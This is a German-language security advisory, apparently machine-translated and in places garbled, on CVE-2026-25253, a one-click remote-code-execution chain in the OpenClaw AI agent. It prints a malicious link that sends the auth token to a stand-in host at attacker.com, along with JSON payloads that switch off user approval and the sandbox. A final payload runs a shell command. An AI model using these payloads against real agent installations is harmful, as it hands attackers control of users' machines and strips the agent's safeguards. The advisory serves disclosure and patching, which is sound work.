1. eine Einführung in OpenClaw
OpenClaw (früher bekannt als Clawdbot, Moltbot) ist ein quelloffenes autonomesKünstliche Intelligenz (KI)Personal Assistant Projekt, das erstmals im November 2025 veröffentlicht wurde. Es zielt darauf ab, den Nutzern einen selbst-hostbaren, lokal laufenden KI-Agenten zur Verfügung zu stellen, der die Fähigkeiten von Large Language Models (LLMs) mit den Privilegien der realen Systembedienung tief integriert. Im Gegensatz zu SaaS-Assistenten, die Benutzerdaten in der Cloud speichern, wird OpenClaw auf dem eigenen Gerät des Benutzers (z. B. Laptop, Heimserver oder VPS) bereitgestellt, wodurch der Datenschutz und die Kontrolle über die Daten gewährleistet werden. .
Das Projekt hat aufgrund seiner leistungsstarken Funktionen und seiner offenen Architektur schnell an Popularität in der Entwicklergemeinschaft gewonnen, wobei das GitHub-Repository in kurzer Zeit mehr als 149.000 Starmarks erhalten hat.OpenClaw kann in eine Vielzahl von Instant-Messaging-Apps wie iMessage, WhatsApp, Slack usw. integriert werden und erhält erweiterte Systemprivilegien, wie das Lesen und Schreiben von Dateien und das Ausführen von Shell-Befehlen, um um komplexe, vom Benutzer zugewiesene Aufgaben zu erledigen Dieses "God-mode"-Privilegienkonzept schafft jedoch auch die Voraussetzungen für ernsthafte Sicherheitslücken. Dieses "God-mode"-Privilegienkonzept schafft jedoch auch die Voraussetzungen für schwerwiegende Sicherheitsschwachstellen.
2. das Prinzip der OpenClaw-Schwachstelle
CVE-2026-25253Die Schwachstelle, die mit einem CVSS 3.1 Score von 8.8 (hohes Risiko) bewertet wurde, beruht auf einer Kette von Logikfehlern, die die Offenlegung von Token, das seitenübergreifende WebSocket-Hijacking und die Flucht aus der Sandbox beinhalten. Der gesamte Angriff kann ohne Benutzerinteraktion durch Klicken auf einen Link ausgelöst werden.
2.1 Zentrale Verwundbarkeitskette
Die Schwachstelle besteht aus drei miteinander verknüpften Schlüsselstellen, die in der nachstehenden Tabelle aufgeführt sind:
|
ringförmiger Ring |
Dokumentation/Module |
Defekt Beschreibung |
|
Token-Leck |
app-settings.ts |
Die Steuerschnittstelle vertraut den URL-Abfrageparametern blind und persistiert sie in dergatewayUrl. |
app-lifecycle.ts |
existierengatewayUrlUnmittelbar nach dem Einstellen wird die Verbindung zum neuen Gateway automatisch ausgelöst. |
|
gateway.ts |
Wenn eine WebSocket-Verbindung aufgebaut wird, wird automatisch die hoch privilegierteauthTokenlieferngatewayUrl. |
|
|
Standortübergreifendes WebSocket-Hijacking (CSWSH) |
WebSocket-Server |
Auf die Verbindungsanfrage für dieHerkunftHeader für die Authentifizierung, so dass Verbindungen aus beliebigen Quellen möglich sind. |
|
Flucht aus dem Sandkasten |
API |
Ein Angreifer kann die gestohlenenoperator.adminim Gesang antwortenBetreiber.zulassungenBerechtigungen und die Deaktivierung von Sicherheitsschutzmechanismen durch API-Aufrufe. |
Erstens, wenn ein Benutzer auf eine Datei klickt, die eine bösartige Datei enthältgatewayUrlEin Link zu einem Parameter (z.B. http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 ), speichert die Front-End-Anwendung von OpenClaw die Serveradresse des Angreifers als neue Gateway-Adresse ohne Authentifizierung. Die Anwendung versucht dann sofort, eine WebSocket-Verbindung mit dieser neuen Adresse herzustellen, und fügt der Verbindungsanfrage eine lokal gespeicherte, authentifizierteauthToken. Ein Angreifer, der auf seinem Server lauscht, kann dieses Token leicht abfangen .
Zweitens, weil die Browser die SOP (same-origin policy) für WebSocket-Verbindungen nicht durchsetzen und der WebSocket-Server von OpenClaw die Authentifizierung derHerkunftRequest Header, was zu der Möglichkeit des Cross-Site WebSocket Hijacking führt. Dies bedeutet, dass ein Angreifer JavaScript auf seiner bösartigen Website verwenden kann, damit der Browser des Opfers als "Sprungbrett" zu einem Webserver fungiert, der auf demlocalhostDie WebSocket-Verbindung wird von der OpenClaw-Instanz auf der .
Schließlich kann ein Angreifer mit einem gestohlenen Token mit erhöhten Rechten die integrierten Sicherheitsmechanismen von OpenClaw über API-Aufrufe ausschalten. Diese Mechanismen wurden ursprünglich zum Schutz vor bösartigem Verhalten im KI-Modell eingesetzt, z. B. durch Prompt Injection, einschließlich der Aufforderung zur Bestätigung durch den Benutzer vor der Ausführung gefährlicher Befehle und der Ausführung von Code in einer containerisierten Sandbox. Angreifer können diese Schutzmechanismen leicht ausschalten und so beliebige Befehle direkt auf dem Host ausführen. .
Abb. 1: OpenClaw-Architektur und CVE-2026-25253-Schwachstellenpfad
Abbildung 2: OpenClaw One-Click RCE-Nutzungskette
3 OpenClaw POC/EXP
Nach Angaben des Sicherheitsforschers Mav Levin kann die komplette "One-Click-RCE"-Angriffskette innerhalb von Millisekunden abgeschlossen werden, wenn ein Opfer eine bösartige Webseite besucht.
Abbildung 3: OpenClaw CVE-2026-25253 Angriffsablauf
3.1 Ablauf des Angriffs
1.einen Klick auslösenDas Opfer wird veranlasst, eine vom Angreifer kontrollierte Webseite zu besuchen (z. B. Angreifer.com).
2.Token-DiebstahlDas JavaScript der Seite öffnet im Hintergrund eine URL, die auf die OpenClaw-Instanz des Opfers verweist, und eine dazugehörige URL, die auf den Server des Angreifers verweist.gatewayUrlParameter, der dieauthTokenan den Angreifer gesendet.
3.Lokale Konnektivität und PrivilegierungEin weiteres Stück JavaScript auf der Seite nutzt die CSWSH-Schwachstelle aus, indem es ein gestohlenes Token verwendet, um sich mit dem lokalen OpenClaw WebSocket-Dienst des Opfers zu verbinden (der standardmäßig mit dem ws://localhost:18789).
4.Sicherheit deaktivierenAngriffsskripte senden API-Anfragen, deaktivieren die Benutzerbestätigung und den Sandbox-Modus.
Vom Benutzer bestätigte Payloads deaktivieren:
{"Methode": "exec.approvals.set","params": { "Voreinstellungen": { "Sicherheit": "voll", "fragen": "aus" } }}
Sandboxing der Nutzlast deaktivieren: durchconfig.patchverlangen, dasstools.exec.hosteingestellt aufGateway.
5.Ausführen von beliebigem CodeSchließlich sendet das Angriffsskript einenode.invokeAnfrage und ruft diesystem.laufBefehl, um beliebigen Code auf dem Opfer-Host auszuführen.
RCE-Nutzlast Beispiel:
{"Typ": "req","id": “4”,"Methode": "node.invoke","params": {"nodeId": "Haupt","Befehl": "system.run","params": {"cmd": "bash -c 'echo hacked > /tmp/hacked'" } }}
Abbildung 4: Cross-Site WebSocket Hijacking (CSWSH) Mechanismus im Detail
4) Programm zur Behebung von Schwachstellen
Das OpenClaw-Team hat schnell reagiert und einen Fix veröffentlicht! 2026.1.29. Die wichtigsten Korrekturen sind die Unterbrechung der Kette fehlerhafter automatischer Verbindungen und die Verbesserung der Sicherheit von Benutzerinteraktionen.
"Der Patch fügt ein Gateway-URL-Bestätigungsmodal hinzu und beseitigt das Verhalten der automatischen Verbindung ohne Eingabeaufforderung.
Spezifische Korrekturen umfassen:
Dialogfeld zur Bestätigung hinzufügen: WenngatewayUrlWenn der Parameter zum Ändern der Gateway-Adresse verwendet wird, wird ein Bestätigungsdialogfeld angezeigt, in dem der Benutzer aufgefordert wird, die Änderung manuell zu bestätigen.
Automatische Verbindung entfernenVollständig entfernt wurde das Verhalten, sich automatisch mit einem neuen Gateway zu verbinden, ohne die ausdrückliche Erlaubnis des Benutzers.
Die Behörden empfehlen allen Nutzern ein sofortiges Upgrade auf v2026.1.29 oder höher. Außerdem sollten Benutzer, die vermuten, dass ihr Authentifizierungs-Token kompromittiert worden sein könnte, sofort das .
5. referenz
[1] CSO. Clawdbot Enterprise Intelligent Body Application Security Hardening Guide.” 2026-01-31.
[2] Levin, Mav. "1-Click RCE To Steal Your Moltbot Data and Keys (CVE-2026-25253)." depthfirst. 2026-02-01.
[3] National Vulnerability Database: "CVE-2026-25253".
[4] GitHub: "Falscher Ressourcentransfer zwischen Sphären in openclaw/openclaw", ghsa-g8p2-7wf7-98mq.
Originalartikel von Chief Security Officer, bei Vervielfältigung bitte angeben: https://www.cncso.com/de/openclaw-one-click-remote-code-execution.html
